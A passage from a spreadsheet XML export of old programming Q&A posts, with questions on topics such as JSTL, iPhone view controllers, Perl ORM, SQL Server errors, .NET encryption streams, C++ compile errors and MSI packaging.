&lt;p&gt;Under jstl.jar/META-INF/MANIFEST.MF stays: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Manifest-Version: 1.0
Ant-Version: Apache Ant 1.5.3 
Created-By: 1.4.2-b28 (Sun Microsystems Inc.)
Specification-Title: JavaServer Pages Standard Tag Library (JSTL)
Specification-Version: 1.1
Implementation-Title: JavaServer Pages Standard Tag Library API Refere
 nce Implementation
Implementation-Version: 1.1.0-D13
Implementation-Vendor: Sun Microsystems, Inc.
Implementation-Vendor-Id: com.sun
Extension-Name: javax.servlet.jsp.jstl
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am using Apache Tomcat Version 6.0.14&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to know when the UIViewController above me in the stack has been popped?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a &lt;code&gt;UIViewController&lt;/code&gt; that manages the display of some data. When the user wants to edit this data I push an edit &lt;code&gt;UIViewController&lt;/code&gt; onto the stack. When the user is finished editing the top view controller is popped off the stack. What is the most elegant way to know that I need to update my display after the edit view is popped off?&lt;/p&gt;
&lt;p&gt;I thought that I might be able to put the content update code into the &lt;code&gt;viewDidLoad&lt;/code&gt; method of my data view, but this method isn't always called when my view displays, especially not when I'm navigating down the view stack.&lt;/p&gt;
&lt;p&gt;I also considered setting up my data view controller as a delegate for the &lt;code&gt;UINavigationController&lt;/code&gt; and wait for &lt;code&gt;â€“ navigationController:didShowViewController:animated:&lt;/code&gt; to be called, my concern is that there may be other view controllers that need to be notified when they're displayed and it will turn into a minor headache managing which controller should be receiving the &lt;code&gt;didShowViewController&lt;/code&gt; message.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there an ORM for Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;
create table person
(
    name varchar(15),
    attr1 varchar(15),
    attr2 varchar(1),
    attr3 char(1),
    attr4 int
)
&lt;/pre&gt;
&lt;p&gt;How I can use basic ORM in Perl by taking a simple table like the one above and mapping it to Perl objects?  Next I'd like to perform basic operations like select results using some criteria system Perl like syntax. eg.:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@myResults = findAll(attr1 == 3 &amp;amp;&amp;amp; attr2 =~ /abc/);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What do I need to write Java-based web applications and test them on my personal computer?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I currently have Apache HTTP Server, but I'm guessing I'll need Tomcat (and then have to configure it in a way that makes it not open to the public), a Java JDK (which I already have, but should probably update), and an IDE (I have Eclipse). But what else should I have or know before starting?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Error: Failed to generate a user instance of SQL Server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to connect to an MDF.  I've even gone to the lengths of re-installing sql server express entirely (it is now the only flavor of SQL installed on my box, where previously I had 05 dev and express).  I've verified that the paths are all correct, and thus far my google-fu hasn't helped.&lt;/p&gt;
&lt;p&gt;The Full exception message is: &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Failed to generate a user instance of SQL Server due to a failure in
  starting the process for the user instance.  The connection will be
  closed.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The Connection string is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;add name= "CustomerEntities"
     connectionString="metadata=res://*/Data.CustomerModel.csdl|res://*/Data.CustomerModel.ssdl|res://*/Data.CustomerModel.msl;
     provider=System.Data.SqlClient;
     provider connection string='Data Source=.\SQLEXPRESS;
     AttachDbFilename=\App_Data\CustomerDb.mdf;
     Integrated Security=True;
     User Instance=True'"
     providerName="System.Data.EntityClient" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Additional info:&lt;/h3&gt;
&lt;p&gt;Several of the references to this error I've found online do not apply to me.  For example, one I've seen is where this error occurs when trying to start the user instance over remote desktop (I'm doing this locally).  While another suggests that it has to do with leftover files from an old express installation ... I've looked in the prescribed locations and not found those artifacts.  I also tried running &lt;code&gt;sp_configure 'user instances enabled', '1'&lt;/code&gt;, but it said that it was already set to 1.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio variable declaration</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a project that has the following line in the additional includes section:&lt;/p&gt;
&lt;p&gt;"$(SOMEPATH_SHORTNAME)\include"&lt;/p&gt;
&lt;p&gt;Can someone tell me where I can find $(SOMEPATH) defined? I can't find it by simply searching in Visual Studio&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the actual performance differences between Int64 and Int32 on 32 and 64 bit MS Windows?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the actual performance differences between Int64 and Int32 on 32 and 64 bit MS Windows?&lt;/p&gt;
&lt;p&gt;It would also be great to see some actual timings of Int64 vs Int32 on each of the two operating system variants.  XP or Vista would also be interesting.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;See also this question about &lt;a href="http://stackoverflow.com/questions/269408/memcpy-performance-differences-between-32-and-64-bit-processes"&gt;memcpy&lt;/a&gt; performance.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How do I get a human-readable file size in bytes abbreviation using .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I get a human-readable file size in bytes abbreviation using .NET?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Example&lt;/strong&gt;:
Take input 7,326,629 and display 6.98 MB&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reg-Free COM in an ASP.Net application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am wondering if it is possible to use Reg-Free COM in an ASP.Net application?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hibernate JPA to DDL command line tools</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There are Hibernate tools for mapping files to ddl generation; ddl to mapping files and so on, but I can't find any command line tools for simple DDL generation from JPA annotated classes.&lt;/p&gt;
&lt;p&gt;Does anyone know an easy way to do this? (Not using Ant or Maven workarounds)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there any Ajax-based UML modeling tools?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for something like &lt;a href="http://ondras.zarovi.cz/sql/demo/?keyword=default" rel="nofollow"&gt;WWW SQL Designer&lt;/a&gt; for UML Modeling.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to highlight input text field upon clicking it in Safari?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like the value of the input text box to be highlighted when it gains focus, either by clicking it or tabbing to it.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;script&amp;gt;
function focusTest(el)
{
   el.select();
}
&amp;lt;/script&amp;gt;
&amp;lt;input type="text" value="one" OnFocus="focusTest(this); return false;" /&amp;gt;
&amp;lt;br/&amp;gt;
&amp;lt;input type="text" value="two" OnFocus="focusTest(this); return false;" /&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When either input field is clicked in Firefox or IE, that field is highlighted. However, this doesn't work in Safari. (NOTE: it works when tabbing between fields.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do Streams do when implementing AES encrption in .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The Rijndael encryption algorithm is implemented in .NET using 3 streams in the following example: &lt;a href="http://msdn.microsoft.com/en-us/library/system.security.cryptography.rijndaelmanaged.aspx" rel="nofollow"&gt;Rinjdael&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Can someone explain to me what these streams are doing?  How/Why are they used?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Declare the streams used
// to encrypt to an in memory
// array of bytes.
MemoryStream msEncrypt = null;
CryptoStream csEncrypt = null;
StreamWriter swEncrypt = null;
// Declare the RijndaelManaged object
// used to encrypt the data.
RijndaelManaged aesAlg = null;
try
{
    // Create a RijndaelManaged object
    // with the specified key and IV.
    aesAlg = new RijndaelManaged();
    aesAlg.Key = Key;
    aesAlg.IV = IV;
    // Create a encryptor to perform the stream transform.
    ICryptoTransform encryptor = aesAlg.CreateEncryptor(aesAlg.Key, aesAlg.IV);
    // Create the streams used for encryption.
    msEncrypt = new MemoryStream();
    csEncrypt = new CryptoStream(msEncrypt, encryptor, CryptoStreamMode.Write);
    swEncrypt = new StreamWriter(csEncrypt);
    //Write all data to the stream.
    swEncrypt.Write(plainText);
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I read the value of a checkbox in a word (*.doc) file in VB.net using a Range object?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I read the value of a checkbox in a word (*.doc) file in VB.net using a range object?&lt;/p&gt;
&lt;p&gt;This is what I have so far:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim app As New Word.Application
Dim doc As Document
doc = app.Documents.Open("C:\myDoc.doc")
dim chkBox as Bookmark
chkBox = doc.Bookmarks("MyCheckbox")
Dim rng as Range
rng = chkBox.Range
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;where "MyCheckbox" is the bookmark of the checkbox in the word document. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I write unit tests in PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've read everywhere about how great they are, but for some reason I can't seem to figure out how exactly I'm supposed to test something. Could someone perhaps post a piece of example code and how they would test it? If it's not too much trouble :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Garbage Collector Flash Player</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to force the flash garbage collector to clean up freed memory? I've seen that it takes a lot of time for flash to clean up not referenced memory...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to find out Subversion repository version?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I determine current version of my repository to see if I need to upgrade it (svnadmin upgrade)?&lt;/p&gt;
&lt;p&gt;In reality I'm hosting SVN with 3rd party and I want to find out if I need to ask them to upgrade my repos or not.&lt;/p&gt;
&lt;p&gt;I'm asking since 1.5 server will keep repo version at 1.4, unless I miss something?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ Opening a file and inputting data to a class object</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Simple question, hopefully an easy way and just want to verify I'm doing it the correct / efficient way.&lt;/p&gt;
&lt;p&gt;I have a class T object, which is typically put into a vector that is created in my main() function.  It can be any kind of data, string, int, float.. etc.  I'm reading from a file... which is inputted from the user and passed onto the function.  Here is my basic read in function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;template &amp;lt;class T, class U&amp;gt;
void get_list(vector&amp;lt;T&amp;gt;&amp;amp; v, const char *inputFile, U)
{
ifstream myFile;
T object;
myFile.open("inputFile")
while(!myFile.eof())
   {
   myFile &amp;gt;&amp;gt; object;
   insert(v, object, U)
   }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;insert is just another function that will go through and insert the data into my data structure.  I just want to make sure this is the best way to pass that data on if it will even work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Image DPI Explained</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Attempting to write a definition of DPI has lead me to:&lt;/p&gt;
&lt;p&gt;DPI (dots), PPI (points), LPI (lines) all refer to the same concept hereafter referred to as DPI.&lt;/p&gt;
&lt;p&gt;DPI is a device dependent measurement.  It says, "This is the resolution of this device."&lt;/p&gt;
&lt;p&gt;Vector based files are not tied to any one DPI (they expand and contract to conform to a certain resolution).&lt;/p&gt;
&lt;p&gt;When that vector based file is rendered to a "bitmap" based format - (bmp, png, tiff, jpg) etc... that "bitmapped" file is created at a certain DPI for printing (or display) on "banding" or "scanline" based devices that output at that specific DPI.&lt;/p&gt;
&lt;p&gt;Now, some would argue that DPI does not exist in "bitmapped" based files.&lt;/p&gt;
&lt;p&gt;I'm looking for a definition of DPI and how or why it would be considered to not exist in a bitmapped image?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Computing a mean confidence interval without storing all the data points</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For large &lt;code&gt;n&lt;/code&gt; (see below for how to determine what's large enough), it's safe to treat, by the central limit theorem, the distribution of the sample mean as normal (gaussian) but I'd like a procedure that gives a confidence interval for any &lt;code&gt;n&lt;/code&gt;.  The way to do that is to use a Student T distribution with &lt;code&gt;n-1&lt;/code&gt; degrees of freedom.&lt;/p&gt;
&lt;p&gt;So the question is, given a stream of data points that you collect or encounter one at a time, how do you compute a &lt;code&gt;c&lt;/code&gt; (eg, &lt;code&gt;c=.95&lt;/code&gt;) confidence interval on the mean of the data points (without storing all of the previously encountered data)?&lt;/p&gt;
&lt;p&gt;Another way to ask this is: How do you keep track of the first and second moments for a stream of data without storing the whole stream?&lt;/p&gt;
&lt;p&gt;BONUS QUESTION:  Can you keep track of higher moments without storing the whole stream?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the optimal GZIP compression setting for IIS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;You can set the HcDynamicCompressionLevel anywhere from 0-10. I've heard 10 is bad (high CPU usage), but what's the magic number that works the best? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using varchar instead of date field types in MySQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any reason to use a varchar field instead of a date field in MySQL? I'm looking at an existing site and I see the developer has done this. Is there any reason to?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Easiest way to sort DOM nodes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I have a list like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ul id="mylist"&amp;gt;
    &amp;lt;li id="list-item1"&amp;gt;text 1&amp;lt;/li&amp;gt;
    &amp;lt;li id="list-item2"&amp;gt;text 2&amp;lt;/li&amp;gt;
    &amp;lt;li id="list-item3"&amp;gt;text 3&amp;lt;/li&amp;gt;
    &amp;lt;li id="list-item4"&amp;gt;text 4&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What's the easiest way to re-arrange the DOM nodes to my preference? (This needs to happen automatically when the page loads, the list-order preference is gained from a cookie)&lt;/p&gt;
&lt;p&gt;E.g.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ul id="mylist"&amp;gt;
    &amp;lt;li id="list-item3"&amp;gt;text 3&amp;lt;/li&amp;gt;
    &amp;lt;li id="list-item4"&amp;gt;text 4&amp;lt;/li&amp;gt;
    &amp;lt;li id="list-item2"&amp;gt;text 2&amp;lt;/li&amp;gt;
    &amp;lt;li id="list-item1"&amp;gt;text 1&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I create a list control with Rich text in FLEX?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am a FLEX newbie, trying to port a Javascript-based prototype into FLEX. One thing my original prototype had was an unordered list (ul) which had list items that had rich text inside it, i.e. I had a mix of differently styled and colored text and some images inside each item. I looked at the List control for FLEX and it only supports displaying a simple string and an icon. How would I go about making a rich text capable list control?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ld: duplicate symbol</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a school project and I'm getting some weird errors from Xcode. I'm using TextMate's Command+R function to compile the project. Compilation seems to work okay but linking fails with an error message I don't understand. &lt;/p&gt;
&lt;p&gt;ld output:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;ld: duplicate symbol text_field(std::basic_istream &gt;&amp;amp;)in /path/final/build/final.build/Release/final.build/Objects-normal/ppc/generics.o and /path/final/build/final.build/Release/final.build/Objects-normal/ppc/main.o
  collect2: ld returned 1 exit status&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Below is my file io_functions.cpp This is the only declaration of text_field in the entire project. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;string&amp;gt;
#include &amp;lt;iostream&amp;gt;
#include &amp;lt;iomanip&amp;gt;
using namespace std;
#ifndef ENDF
#define ENDF '|'
#define ENDR '\n'
/**
reads one field from a given input stream
Usage: var = text_field(in)
*/
string text_field(istream &amp;amp;in){
	string s;
	getline(in, s, ENDF);
	return s; 
}
long long_field(istream &amp;amp;in){
	return atol(text_field(in).c_str()); 
}
int int_field(istream &amp;amp;in){
	return atoi(text_field(in).c_str()); 
}
double double_field(istream &amp;amp;in){
	return atof(text_field(in).c_str()); 
}
#endif
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is going wrong? For a number of reasons I don't want to post my project's entire source. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to find whether a Windows user belongs to specified group?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Currently we have a DLL that checks whether a username/password is a valid Windows user using the Windows API LogonUser method. We need to enhance it so it checks whether the user belongs to a specified group as well. Is there a Windows method that does that?&lt;/p&gt;
&lt;p&gt;Given a Windows username and password, find out whether the user belongs to a specified group.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ odd compile error: error: changes meaning of "Object" from class "Object"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I don't even know where to go with this. Google wasn't very helpful. As with my previous question. I'm using TextMate's Command+R to compile the project. &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;game.h:16:error: declaration of â€˜Player* HalfSet::Player() constâ€™&lt;/p&gt;
  &lt;p&gt;players.h:11:error: changes meaning of â€˜Playerâ€™ from â€˜class Playerâ€™&lt;/p&gt;
  &lt;p&gt;game.h:21:error: â€˜Playerâ€™ is not a type&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;player.h file (partial)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#ifndef PLAYERS_H
#define PLAYERS_H
using namespace std;
#include &amp;lt;string&amp;gt;
#include &amp;lt;vector&amp;gt;
#include &amp;lt;istream&amp;gt;
#include &amp;lt;iomanip&amp;gt;
#include "generics.h"
class Player{ //Line 11
public:
	//getters
	long Id() const;
	string FirstName() const;
	string LastName() const;
	string Country() const;
	//setters
	void setId(long id);
	void setFirstName(string s);
	void setLastName(string s);
	void setCountry(string s);
	//serializing functions
	void display(ostream &amp;amp;out);
	void read(istream &amp;amp;in);
	void write(ostream &amp;amp;out);
	//Initalizers
	Player();
	Player(istream &amp;amp;in);
	Player(string firstName, string lastName);
	Player(string firstName, string lastName, string country);
	Player(long id, string firstName, string lastName, string country);
	~Player();
private:
	long _id;
	string _firstName;
	string _lastName;
	string _country;
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;game.h file (partial)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#ifndef GAME_H
#define GAME_H
#include "generics.h"
#include "players.h"
#include &amp;lt;string&amp;gt;
#include &amp;lt;vector&amp;gt;
#include &amp;lt;istream&amp;gt;
#include &amp;lt;iomanip&amp;gt;
using namespace std;
class HalfSet{
public:
	//getters
	Player* Player() const; //Line 16
	int GamesWon() const;
	int TotalPoints() const;
	int Errors() const;
	//setters
	void setPlayer(Player* p);
	void setGamesWon(int games);
	void setTotalPoints(int points);
	void setErrors(int errors);
	//Serialization
	void display(ostream &amp;amp;out) const;
	void read(istream &amp;amp;in) const;
	void write(ostream &amp;amp;out) const;
	//Initalizers
	HalfSet();
	~HalfSet();
private:
	Player* _player;
	int _gamesWon;
	int _points;
	int _errors;
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is going on here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Looking for VB.NET open source projects to learn from</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for some small, vb.net open source projects that make good use of unit testing. Similar to &lt;a href="http://stackoverflow.com/questions/236156/could-you-recommend-any-open-source-projects-where-the-source-is-extensively-te"&gt;this&lt;/a&gt; question, but for VB.NET. &lt;/p&gt;
&lt;p&gt;"I would like to improve my unit-testing skills by reading, examining real-world code. Could you recommend any open source projects where the source is extensively tested with unit tests?"&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;UPDATE: Also asked the question for C#  &lt;a href="http://stackoverflow.com/questions/287646/looking-for-small-open-source-c-project-with-extensive-unit-testing"&gt;here&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there any popup editor function in iphone?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to popup a simple dialog with an editor box, to let user enter some value then just return. I am wondering whether iPhone SDK has that kind of support.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Assign default value to a datacolumn in a select statement</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to assign default values to a column in my select sql query so that if the value of that column is null I get that default value in my recordset.  Is there anyway to do this?&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select col1 (some default value) from tblname;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC UpdateModel with a sorta complex data entry field</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;how do i do the following, with an ASP.NET MVC UpdateModel? I'm trying to read in a space delimeted textbox data (exactly like the TAGS textbox in a new StackOverflow question, such as this) into the model.&lt;/p&gt;
&lt;p&gt;eg.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;input type="Tags" type="text" id="Tags" name="Tags"/&amp;gt;
...
public class Question
{
    public string Title { get; set; }
    public string Body { get; set; }
    public LazyList&amp;lt;string&amp;gt; Tags { get; set; }
}
....
var question = new Question();
this.UpdateModel(question, new [] { "Title", "Body", "Tags" });
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the Tags property does get instantiated, but it contains only one item, which is the entire data that was entered into the Tags input field. If i want to have a single item in the List (based upon Splitting the string via space) .. what's the best practice do handle this, please?&lt;/p&gt;
&lt;p&gt;cheers!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to put aspx files into a class library in Visual Studio 2008 .NET 3.5?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a lot of pages in my site, I'm trying to think of a nice way to separate these into areas that are a little more isolated than just simple directories under my base web project.  Is there a way to put my web forms into a separate class library?  If so, how is it done?&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Asp.net Date Binding Issue with Nulls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a nullable date in my database. I am connecting to it with a LinqDataSource, and binding with a FormView. It allows you to place dates fine, but if you remove the date I need it to insert the null value to the db. It is instead throwing an exception.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:TextBox ID="TxtStartDate" runat="server" 
                    Text='&amp;lt;%# Bind("StartDate", "{0:MM/dd/yyyy}") %&amp;gt;' /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Works fine if you place a date in it, but if you delete the date out of it and save, you get System.Data.SqlTypes.SqlTypeException: SqlDateTime overflow. Must be between 1/1/1753 12:00:00 AM and 12/31/9999 11:59:59 PM. How do I make it send null?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Advice on which language/Framework to choose for web application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am a c++ developer trying to create a web application using a language or framework that meets the following criteria:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Very fast development time&lt;/li&gt;
&lt;li&gt;Text searching and other text manipulation&lt;/li&gt;
&lt;li&gt;Easy to configure and maintain the application&lt;/li&gt;
&lt;li&gt;Tagging system support&lt;/li&gt;
&lt;li&gt;Free (as in Beer) IDE&lt;/li&gt;
&lt;li&gt;3-4 weekend project&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Can anyone suggest a language or framework that would be beneficial, giving this criteria?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>how to combine a template from other processed templates?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a django project pro1 with several apps: app1, app2, app3 and so on. I want to display some top level template that contains blocks from each and every app:&lt;/p&gt;
&lt;p&gt;example_base_template.html:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[header /]
[left nav bar]{{ app1 rendered template }}[/left nav bar]
[right nav bar]{{ app2 rendered template }}[/right nav bar]
[center section]{{ app1 main functionality template }}[/center section]
[footer]{{ app3 rendered template }}{{ app4 rendered template }}[/footer]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;All those app templates are dynamic, that use DB. How to do that in the most proper and elegant way? Or maybe the question is how to connect 4 different views to one URL?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a specification of the group leader protocol that handles IO?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Erlang, every process has a group leader, and when a process wants to print something (i.e. it calls the io library or does something similar), it will send a message to its group leader.&lt;/p&gt;
&lt;p&gt;My question is, where can I find the specification of these messages? Or in general, the specification of what a group leader should do?&lt;/p&gt;
&lt;p&gt;I managed to find out with some experimenting that sometimes the process sends an &lt;code&gt;{io_request, Sender, GroupLeader, Request}&lt;/code&gt; term, and the answer is an &lt;code&gt;{io_reply, GroupLeader, ok}&lt;/code&gt; term, but there may be other cases.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you organise your STL headers?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a large project that uses the STL and have a question about your preferred way to organise your STL &lt;code&gt;#includes&lt;/code&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Do you prefer to #include each header in the source file it is used.  For example, if both &lt;code&gt;foo.cpp&lt;/code&gt; and &lt;code&gt;bar.cpp&lt;/code&gt; require &lt;code&gt;std::string&lt;/code&gt;, then both will &lt;code&gt;#include &amp;lt;string&amp;gt;&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Do you prefer to have a single header file that includes all the STL headers your project uses (i.e. add them to the MS 'stdafx.h' pre-compiled header).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The advantage of the first method is that the .cpp file is an independent unit and can be used in a different project without having to worry that you're missing a &lt;code&gt;#include&lt;/code&gt;.  The advantages of the second method is that you can take use your compilers pre-compiled header support plus you can wrap STL &lt;code&gt;#includes&lt;/code&gt; in &lt;code&gt;pragmas&lt;/code&gt; that disable some warnings (for example, some Boost headers will cause warnings when compiling at level 4).&lt;/p&gt;
&lt;p&gt;Which do you prefer to use?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ERROR : [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;While connecting .net to sybase server I got this error message:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;[Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This has worked properly before. System DSN with same details work and data connection through vs.net also work.&lt;/p&gt;
&lt;p&gt;I am using vs.net 2005.&lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>IAutomationObject not found when running Flex application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i get the following error when trying to run a flex application (which has been working fine!). I was playing around with some different setttings trying to optimize the compiled size. I've put these settings back to the defaults as much as I thought but still getting issues.&lt;/p&gt;
&lt;p&gt;I remember getting this error before but cant seem to remember how I fixed it - nor any useful information about how to fix it again! &lt;/p&gt;
&lt;p&gt;Anybody know?&lt;/p&gt;
&lt;p&gt;VerifyError: Error #1014: Class IAutomationObject could not be found.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;at flash.display::MovieClip/nextFrame()
at mx.managers::SystemManager/deferredNextFrame()[E:\dev\3.1.0\frameworks\projects\framework\src\mx\managers\SystemManager.as:299]
at mx.managers::SystemManager/preloader_initProgressHandler()[E:\dev\3.1.0\frameworks\projects\framework\src\mx\managers\SystemManager.as:2225]
at flash.events::EventDispatcher/dispatchEventFunction()
at flash.events::EventDispatcher/dispatchEvent()
at mx.preloaders::Preloader/timerHandler()[E:\dev\3.1.0\frameworks\projects\framework\src\mx\preloaders\Preloader.as:398]
at flash.utils::Timer/_timerDispatch()
at flash.utils::Timer/tick()
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to build native Mac OS X installer (on a non-Mac platform)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I build a native Mac OS X installer for my application, on a non-Mac platform?&lt;/p&gt;
&lt;p&gt;For example, I have a windows pc and a Java application. I want the windows pc to build an installer (possibly inside a .dmg archive) that works with Apple installer.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MSI packaging guidance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're in the process of packaging combinations of our products/modules. Some of them are stand-alone some are interdependent. All versions must be deployable side-by-side. As it is we're considering two choices:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;One MSI per package and version&lt;/li&gt;
&lt;li&gt;One MSI per product/module and version&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The first alternative would mean that combinations of the same merge modules would be delivered in several packages. The second alternative represents the simpler path.&lt;/p&gt;
